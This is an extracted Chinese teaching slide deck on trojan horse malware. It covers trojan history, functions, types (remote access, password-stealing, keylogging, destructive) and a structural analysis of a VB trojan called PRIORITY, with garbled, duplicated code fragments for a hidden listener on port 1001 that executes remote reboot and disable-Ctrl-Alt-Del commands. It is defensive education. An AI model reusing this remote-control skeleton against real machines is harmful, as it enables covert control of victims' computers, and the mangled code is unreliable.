计算机病毒与防护木马病毒基础课件.ppt

1、Virus教学单元3-5 木马病毒防治 木马病毒的功能木马的定义和起源木马病毒的特点第一讲第一讲 木马病毒基础木马病毒基础计算机病毒与防治课程小组木马病毒的分类木马病毒的工作原理木马病毒的由来哪位同学能给我们讲一讲关于木马的传说一段古希腊故事越形象越生动越好哦！计算机病毒与防治课程小组木马病毒的起源你应该听过“木马屠城记”的故事吧？然而，这场持续了九年的大战，为何最终竟终结在一只木马上呢？话说风流倜傥的特洛伊王子巴里德，遇上希腊皇后海伦后，竞一发不可收拾地将其诱拐带回国。此举也激起了一场死伤无数的滔天大战。特洛伊木马城遗址木马病毒的起源 原来，希腊人见特洛伊城久攻不下，便特制了一匹巨大的木马，

2、打算来个“木马屠城计”。希腊人在木马中安排了一批视死如归的勇士，待两军激战正酣时，借故战败撤退，诱敌上钩。果然，被敌军撤退喜讯弄得神志不清的特洛伊人哪知中计，当晚使把木马拉进城中，打算来个欢天喜地的庆功宴。谁知，就在大家兴高采烈喝酒欢庆之际，木马中的精锐悍将早己暗中打开城门，来个里应外合的大抢攻开始了！顿时，一个美丽的城市变成了一堆瓦砾、焦土，毁灭于历史中。计算机病毒与防治课程小组传说中的特洛伊木马木马屠城的故事什么是木马病毒呢？我们所要谈的当然不仅仅是这个希腊故事，但我们要谈的木马(也称“特洛伊木马”)，原理跟这个故事差不多。所谓的木马程序其实就是一种远程控制程序，只是后来其功能被修改得越来

3、越强大而已。严格来说它不能算是一种病毒，基本上只要不运行到它就不会有事。一般的用法都是，它会有一个client端程序(己方计算机)、一个sever端程序(对方计算机)给对方运行，只要同时在线就能通过client端的程序来控制对方的计算机。计算机病毒与防治课程小组木马的功能远程监控 记录密码 窃取主机的信息资料 设置系统功能 远程文件操作 发送信息 可以控制对方的鼠标、键盘和监视对方屏幕。更改主机名称，设置系统路径和得知系统版本等。可以远程关机或重新升机，设置鼠标或是把鼠标隐藏起来，终止系统程序，或是耗用大量主机资源致使系统死机。入侵者可以远程控制对方的文件。计算机病毒与防治课程小组木马病毒的特

4、点特性一般病毒蠕虫木马传染性强强弱感染对象文件进程进程主要传播方式文件、网络网络网络破坏性强强弱隐蔽性强强强顽固性较强较强极强欺骗性一般一般强主要攻击目的破坏数据、信息破坏数据、信息窃取数据、信息计算机病毒与防治课程小组木马病毒的分类 远程访问型木马是现在最广泛的特洛伊木马。这种木马起着远程控制的功能，用起来非常简单，只需先运行服务端程序，同时获得远程主机的IP地址，控制者就能任意访问被控制端的计算机。这种木马可以使远程控制者在本地机器上做任意的事情，比如键盘记录、上传和下载功能、发送一个“截取屏幕”等等。这种类型的木马有著名的BO(Backoffice)和国产的冰河等。计算机病毒与防治课程小

5、组1.远程访问型木马木马病毒的分类 密码发送型木马的目的是找到所有的隐藏密码，并且在受害者不知道的情况下把它们发送到指定的信箱。大多数这类木马程序不会在每次Windows重启时都自动加载它们大多数使用25号端口发送电子邮件。计算机病毒与防治课程小组2.密码发送型木马木马病毒的分类 键盘记录型木马是非常简单的，它们只做一种事情，就是记录受害者的键盘敲击，并且在LOG文件里做完整的记录。这种木马程序随着Windows的启动而启动，知道受害者在线并且记录每一个用户事件，然后通过邮件或其他方式发送给控制者。计算机病毒与防治课程小组3.键盘记录型木马木马病毒的分类 大部分木马程序只窃取信息，不做破坏性的

6、事件，但毁坏型木马却以毁坏并且删除文件为己任。它们可以自动地删除受控制者计算机上所有的dl1或exe文件，甚至远程格式化受害者硬盘。毁坏型木马的危害很大，一旦计算机被感染而没有即时删除，系统中的信息会在顷刻间“灰飞烟灭”。计算机病毒与防治课程小组4.毁坏型木马木马病毒的基本工作原理 PRIORITY是一个 VB编写的“木马”，该“木马”包括服务器端的SERVER.EXE及客户端的PRIORITYEXE两个程序。服务器端SERVER.EXE建立了一个SERVER窗体，设定为隐藏窗体，并在任务栏及任务管理器中隐藏，窗体中定义了一个名为TCP2的WINSOCK控件，使用该控件打开1001端口并监听：

7、Private Sub Form Load()Private Sub Form Load()TCP2.LocalPort=1001 TCP2.LocalPort=1001 TCP2.1isten TCP2.1istenEnd SubEnd Sub服务器端监听端口1001计算机病毒与防治课程小组Priority木马结构分析木马病毒的基本工作原理 当黑客用客户端 PRIORITY.EXE发出远程连接请求时，隐藏在被害用户电脑中的SERVER.EXE接受连接请求：PrivateSubTCP2_ConnectionRequest(ByVal requesteld As Long)PrivateSubT

8、CP2_ConnectionRequest(ByVal requesteld As Long)TCP2.Accept requested TCP2.Accept requestedEnd SubEnd Sub计算机病毒与防治课程小组Priority木马结构分析木马病毒的基本工作原理SERVER.EXE执行客户端发出的命令：Private Sub TCP2_DataArrival(ByVal bytesTotal As Long)Private Sub TCP2_DataArrival(ByVal bytesTotal As Long)Dim strData As String Dim strD

9、ata As String TCP2.GetData strData TCP2.GetData strData If strData=If strData=“ExecuteReboot Then ExecuteReboot Then 重新启动 ExitWindows EWX_LogOff,&HFFFFFFFFExitWindows EWX_LogOff,&HFFFFFFFF Elself strOata=ExecuteDisableCtrlAltDel Then Elself strOata=ExecuteDisableCtrlAltDel Then CallDisableCtrlAltDel

10、ete(True)CallDisableCtrlAltDelete(True)使Ctrl-Alt-Del无效 Elself Elself 其它功能 End If End If End Sub End SubPriority木马结构分析计算机病毒与防治课程小组木马病毒的基本工作原理 客户端PRORITY EXE建立了一个frmMain窗体，在窗体中定义了一个名为TCPl的WINSOCK控件、一个cmdConnect按钮、一个IP文本框及完成各种命令的菜单。当黑客欲“窥视”被害者电脑时，与服务器建立连接：Private Sub cmdConnectes _Click()Private Sub cm

11、dConnectes _Click()Server=IP.Text Server=IP.Text TCP1.RemoteHost=Server TCP1.RemoteHost=Server TCP1.RemotePort=1001 TCP1.RemotePort=1001 TCP1.Connect TCP1.ConnectEnd SubEnd Sub若黑客想远程控制被害者电脑重启动机器，则发送命令：Private Sub mnureboot _ClickQPrivate Sub mnureboot _ClickQ TCP1.SendData ExecuteReboot TCP1.SendData ExecuteRebootEnd SubEnd SubPriority木马结构分析本讲小结什么是木马病毒木马病毒的功能和特点木马病毒的分类Priority木马结构分析 掌握木马病毒 基础知识Virus